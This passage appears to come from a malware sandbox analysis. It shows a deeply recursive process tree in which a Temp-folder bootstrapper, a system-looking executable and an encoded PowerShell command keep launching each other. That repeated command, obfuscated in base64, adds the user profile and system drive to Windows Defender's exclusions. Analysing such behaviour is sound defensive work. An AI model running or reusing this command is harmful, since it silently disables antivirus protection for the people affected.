        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAcAB3ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGsAbQBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAdwBrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGQAbABsACMAPgA="
        94⤵
        
        PID:336
        
        C:\Windows\WMI Provider Host.exe
        
        "C:\Windows\WMI Provider Host.exe"
        94⤵
        
        PID:5268
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        94⤵
        
        PID:6492
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAcAB3ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGsAbQBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAdwBrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGQAbABsACMAPgA="
        95⤵
        
        PID:4964
        
        C:\Windows\WMI Provider Host.exe
        
        "C:\Windows\WMI Provider Host.exe"
        95⤵
        
        PID:5804
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        95⤵
        
        PID:1616
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAcAB3ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGsAbQBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAdwBrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGQAbABsACMAPgA="
        96⤵
        
        PID:3696
        
        C:\Windows\WMI Provider Host.exe
        
        "C:\Windows\WMI Provider Host.exe"
        96⤵
        
        PID:7656
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        96⤵
        
        PID:6236
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAcAB3ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGsAbQBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAdwBrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGQAbABsACMAPgA="
        97⤵
        
        PID:8000
        
        C:\Windows\WMI Provider Host.exe
        
        "C:\Windows\WMI Provider Host.exe"
        97⤵
        
        PID:6536
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        97⤵
        
        PID:7648
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAcAB3ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGsAbQBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAdwBrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGQAbABsACMAPgA="
        98⤵
        
        PID:7772
        
        C:\Windows\WMI Provider Host.exe
        
        "C:\Windows\WMI Provider Host.exe"
        98⤵
        
        PID:6064
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        98⤵
        
        PID:6728
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAcAB3ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGsAbQBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAdwBrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGQAbABsACMAPgA="
        99⤵
        
        PID:6712
        
        C:\Windows\WMI Provider Host.exe
        
        "C:\Windows\WMI Provider Host.exe"
        99⤵
        
        PID:6832
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        99⤵
        
        PID:6720
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAcAB3ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGsAbQBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAdwBrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGQAbABsACMAPgA="
        100⤵
        
        PID:2040
        
        C:\Windows\WMI Provider Host.exe
        
        "C:\Windows\WMI Provider Host.exe"
        100⤵
        
        PID:3248
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        100⤵
        
        PID:1572
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAcAB3ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGsAbQBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAdwBrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGQAbABsACMAPgA="
        101⤵
        
        PID:7656
        
        C:\Windows\WMI Provider Host.exe
        
        "C:\Windows\WMI Provider Host.exe"
        101⤵
        
        PID:3984
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        101⤵
        
        PID:7164
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAcAB3ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGsAbQBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAdwBrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGQAbABsACMAPgA="
        102⤵
        
        PID:4992
        
        C:\Windows\WMI Provider Host.exe
        
        "C:\Windows\WMI Provider Host.exe"
        102⤵
        
        PID:2608
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        102⤵
        
        PID:5212
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAcAB3ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGsAbQBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAdwBrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGQAbABsACMAPgA="
        103⤵
        
        PID:5236
        
        C:\Windows\WMI Provider Host.exe
        
        "C:\Windows\WMI Provider Host.exe"
        103⤵
        
        PID:8164
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        103⤵
        
        PID:1924
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAcAB3ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGsAbQBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAdwBrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGQAbABsACMAPgA="
        104⤵
        
        PID:6316
        
        C:\Windows\WMI Provider Host.exe
        
        "C:\Windows\WMI Provider Host.exe"
        104⤵
        
        PID:7048
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        104⤵
        
        PID:4020
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAcAB3ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGsAbQBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAdwBrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGQAbABsACMAPgA="
        105⤵
        
        PID:6604
        
        C:\Windows\WMI Provider Host.exe
        
        "C:\Windows\WMI Provider Host.exe"
        105⤵
        
        PID:5404
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        105⤵
        
        PID:3364
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAcAB3ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGsAbQBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAdwBrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGQAbABsACMAPgA="
        106⤵
        
        PID:2496
        
        C:\Windows\WMI Provider Host.exe
        
        "C:\Windows\WMI Provider Host.exe"
        106⤵
        
        PID:6540
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        106⤵
        
        PID:2588
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAcAB3ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGsAbQBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAdwBrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGQAbABsACMAPgA="
        107⤵
        
        PID:5968
        
        C:\Windows\WMI Provider Host.exe
        
        "C:\Windows\WMI Provider Host.exe"
        107⤵
        
        PID:6724
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        107⤵
        
        PID:5896
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAcAB3ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGsAbQBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAdwBrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGQAbABsACMAPgA="
        108⤵
        
        PID:5388
        
        C:\Windows\WMI Provider Host.exe
        
        "C:\Windows\WMI Provider Host.exe"
        108⤵
        
        PID:6556
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        108⤵
        
        PID:5088
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAcAB3ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGsAbQBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAdwBrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGQAbABsACMAPgA="
        109⤵
        
        PID:5980
        
        C:\Windows\WMI Provider Host.exe
        
        "C:\Windows\WMI Provider Host.exe"
        109⤵
        
        PID:1472
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        109⤵
        
        PID:7912
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAcAB3ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGsAbQBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAdwBrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGQAbABsACMAPgA="
        110⤵
        
        PID:6516
        
        C:\Windows\WMI Provider Host.exe
        
        "C:\Windows\WMI Provider Host.exe"
        110⤵
        
        PID:5732
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        110⤵
        
        PID:5252
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAcAB3ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGsAbQBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAdwBrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGQAbABsACMAPgA="
        111⤵
        
        PID:7292
        
        C:\Windows\WMI Provider Host.exe
        
        "C:\Windows\WMI Provider Host.exe"
        111⤵
        
        PID:1896
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        111⤵
        
        PID:6820
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAcAB3ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGsAbQBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAdwBrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGQAbABsACMAPgA="
        112⤵
        
        PID:7928
        
        C:\Windows\WMI Provider Host.exe
        
        "C:\Windows\WMI Provider Host.exe"
        112⤵
        
        PID:6288
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        112⤵
        
        PID:5188
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAcAB3ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGsAbQBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAdwBrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGQAbABsACMAPgA="
        113⤵
        
        PID:5448
        
        C:\Windows\WMI Provider Host.exe
        
        "C:\Windows\WMI Provider Host.exe"
        113⤵
        
        PID:4468
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        113⤵
        
        PID:7752
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAcAB3ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGsAbQBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAdwBrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGQAbABsACMAPgA="
        114⤵
        
        PID:5896
        
        C:\Windows\WMI Provider Host.exe
        
        "C:\Windows\WMI Provider Host.exe"
        114⤵
        
        PID:6676
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        114⤵
        
        PID:1072
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAcAB3ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGsAbQBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAdwBrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGQAbABsACMAPgA="
        115⤵
        
        PID:7112
        
        C:\Windows\WMI Provider Host.exe
        
        "C:\Windows\WMI Provider Host.exe"
        115⤵
        
        PID:8100
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        115⤵
        
        PID:6300
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAcAB3ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGsAbQBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAdwBrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGQAbABsACMAPgA="
        116⤵
        
        PID:5456
        
        C:\Windows\WMI Provider Host.exe
        
        "C:\Windows\WMI Provider Host.exe"
        116⤵
        
        PID:2116
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        116⤵
        
        PID:7616
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAcAB3ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGsAbQBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAdwBrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGQAbABsACMAPgA="
        117⤵
        
        PID:3948
        
        C:\Windows\WMI Provider Host.exe
        
        "C:\Windows\WMI Provider Host.exe"
        117⤵
        
        PID:7504
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        117⤵
        
        PID:2204
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAcAB3ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGsAbQBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAdwBrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGQAbABsACMAPgA="
        118⤵
        
        PID:5724
        
        C:\Windows\WMI Provider Host.exe
        
        "C:\Windows\WMI Provider Host.exe"
        118⤵
        
        PID:7628
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        118⤵
        
        PID:4632
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAcAB3ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGsAbQBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAdwBrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGQAbABsACMAPgA="
        119⤵
        
        PID:6840
        
        C:\Windows\WMI Provider Host.exe
        
        "C:\Windows\WMI Provider Host.exe"
        119⤵
        
        PID:3364
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        119⤵
        
        PID:3004
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAcAB3ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGsAbQBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAdwBrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGQAbABsACMAPgA="
        120⤵
        
        PID:3544
        
        C:\Windows\WMI Provider Host.exe
        
        "C:\Windows\WMI Provider Host.exe"
        120⤵
        
        PID:7752
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        120⤵
        
        PID:8036
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAcAB3ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGsAbQBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAdwBrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGQAbABsACMAPgA="
        121⤵
        
        PID:6652
        
        C:\Windows\WMI Provider Host.exe
        
        "C:\Windows\WMI Provider Host.exe"
        121⤵
        
        PID:5972
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        121⤵
        
        PID:6764
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAcAB3ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGsAbQBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAdwBrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGQAbABsACMAPgA="
        122⤵
        
        PID:4896
        
        C:\Windows\WMI Provider Host.exe
        
        "C:\Windows\WMI Provider Host.exe"
        122⤵
        
        PID:392
        
